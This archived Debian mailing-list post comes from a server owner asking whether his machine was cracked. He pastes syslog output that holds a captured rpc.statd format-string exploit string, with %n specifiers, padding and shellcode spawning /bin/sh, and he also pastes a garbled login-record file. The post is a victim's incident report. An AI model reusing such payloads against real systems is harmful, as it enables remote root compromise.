Was my system cracked? (retry 2)

To: debian-user@lists.debian.org
Subject: Was my system cracked? (retry 2)
From: Ron Hale-Evans <rwhe@ludism.org>
Date: Sun, 1 Oct 2000 11:52:43 -0700
Message-id: <a0500190ab5fd3832fe79@[63.225.161.89]>

I just realised my earlier tries at sending this message were full of
almost 300K of control characters. I am trying again. Apologies if it
repeats.

*****

Hi all--

I arrived home tonight to see the following message plastered across all my
terminal windows on my webserver, ludism.org:

Message from syslogd@ludism at Sat Sep 30 19:10:53 2000 ... ludism

"???" I thought, and checked the system logs, which read as follows for the
period in question:


Sep 30 19:04:50 ludism inetd[219]: smtp/tcp: bind: Address already in use
Sep 30 19:08:01 ludism /USR/SBIN/CRON[32062]: (mail) CMD ( if [ -x
/usr/sbin/exim -a -f /etc/exim.conf ]; then /usr/sbin/exim -q >/dev/null
2>&1; fi) Sep 30 19:09:00 ludism innd: ME time 599939 idle 599938(2)
artwrite 0(0) artlink 0(0) hiswrite 0(0) hissync 0(3) Sep 30 19:10:53 ludism
Sep 30 19:10:53 ludism syslogd: Cannot glue message parts together Sep 30
19:10:53 ludism 173>Sep 30 19:10:53 /sbin/rpc.statd[205]: gethostbyname
error for
^X??ø^X??ø^Y??ø^Y??ø^Z??ø^Z??ø^[??ø^[??ø%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%nêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêêê1¿Î|YâA^PâA^H?¿âA^Dâ??¿â^A?fÕÄ?^BâY^L?A^Nô?A^H^PâI^DÄA^D^Là^A?fÕÄ?^D?fÕÄ?^E0¿àA^D?fÕ
Sep 30 19:10:53 ludism «^F/bin«F^D/shA0¿àF^Gâv^LçV^PçN^LâÛ?^KÕÄ?^AÕÄË???
Sep 30 19:14:01 ludism /USR/SBIN/CRON[32067]: (news) CMD (rnews -U) Sep 30
19:14:01 ludism innd: ME time 300548 idle 300544(2) artwrite 0(0) artlink
0(0) hiswrite 0(0) hissync 0(3)

I am far from a security expert, but it looks as though someone might have
been running some sort of shell script ("/bin/sh" appears somewhere near
the end of the garbage) via rpc. I also read the IP address 236.137.10.192
near the beginning, but can't locate that machine via host or ping.

Was this one of the famous sysklogd exploits? Yes, I was lazy and did not
upgrade until tonight, but I fear it may be too late.

I also found a file dated Friday, 22 September 2000, 6:03 PM in my /var/log
directory, reading thusly:

µv?9tty1
[...a whole lot of invisible characters...]
Ð?À9tty1F*¥9tty2ÿâã8ttyp4c1019188-a.fedwy1.wa.home.comÖd 8tty2®v
8tty22?«9pts/563.225.161.91íe9ttyp4www.ludism.org

So, do you think my machine has been cracked? It looks as though they've
been trying to cover their tracks, but not doing it very well. If it is a
crack, what can I do about it apart from wiping the machine and rebuilding
from the ground up?

Thanks...

Ron Hale-Evans

--
   Ron's Info Closet: Center for Ludic Synergy, Kennexions Glass Bead Game,
    Positive Revolution FAQ, Hexagram-8 I Ching Mailing List, and links...
   Ron Hale-Evans ... rwhe@ludism.org ... <http://www.apocalypse.org/~rwhe/>
                    Further up and further in! fnord

Reply to:

Follow-Ups:
- Re: Was my system cracked? (retry 2)
  - From: George Bonser <george@shorelink.com>
- Re: Was my system cracked? (retry 2)
  - From: Osamu Aoki <debian@aokiconsulting.com>

Prev by Date: traceroute & ping fail
Next by Date: Re: firewall (fwd)
Previous by thread: Re: traceroute & ping fail
Next by thread: Re: Was my system cracked? (retry 2)
Index(es):
- Date
- Thread